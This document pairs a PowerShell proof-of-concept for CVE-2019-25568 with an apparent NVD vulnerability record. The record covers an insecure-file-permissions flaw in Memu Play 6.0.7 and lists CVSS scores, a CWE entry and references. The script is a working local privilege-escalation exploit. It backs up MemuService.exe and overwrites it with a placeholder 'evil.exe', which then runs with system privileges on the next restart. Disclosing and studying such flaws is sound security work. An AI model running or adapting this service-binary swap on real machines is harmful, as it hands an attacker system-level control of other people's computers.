CVE-2019-25568

# PoC for CVE-2019-25568: Memu Play Privilege Escalation # This script demonstrates replacing the service executable. $TargetPath = "C:\Program Files\Microvirt\Memu\MemuService.exe" $MaliciousPath = "C:\temp\evil.exe" # Check if file exists if (Test-Path $TargetPath) { # Step 1: Backup the original executable Move-Item -Path $TargetPath -Destination "$TargetPath.bak" -Force Write-Host "Original file backed up." # Step 2: Copy malicious payload to target location Copy-Item -Path $MaliciousPath -Destination $TargetPath -Force Write-Host "Malicious executable replaced successfully." # Step 3: Trigger execution (requires reboot or service restart) Write-Host "Privilege escalation will trigger on next service restart or reboot." } else { Write-Host "Target installation not found." }

{"cve": {"id": "CVE-2019-25568", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:20.470", "lastModified": "2026-04-21T16:48:38.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memu Play 6.0.7 contains an insecure file permissions vulnerability that allows low-privilege users to escalate privileges by replacing the MemuService.exe executable. Attackers can rename and overwrite MemuService.exe in the installation directory with a malicious executable, which executes with system-level privileges when the service restarts after a computer reboot."}, {"lang": "es", "value": "Memu Play 6.0.7 contiene una vulnerabilidad de permisos de archivo inseguros que permite a usuarios con pocos privilegios escalar privilegios al reemplazar el ejecutable MemuService.exe. Los atacantes pueden renombrar y sobrescribir MemuService.exe en el directorio de instalación con un ejecutable malicioso, el cual se ejecuta con privilegios de nivel de sistema cuando el servicio se reinicia después de un reinicio del equipo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microvirt:memu:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.7", "matchCriteriaId": "E3CA96D5-3015-4FF0-9B03-B7E75782CFCD"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46437", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.memuplay.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/memu-play-privilege-escalation-via-insecure-file-permissions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}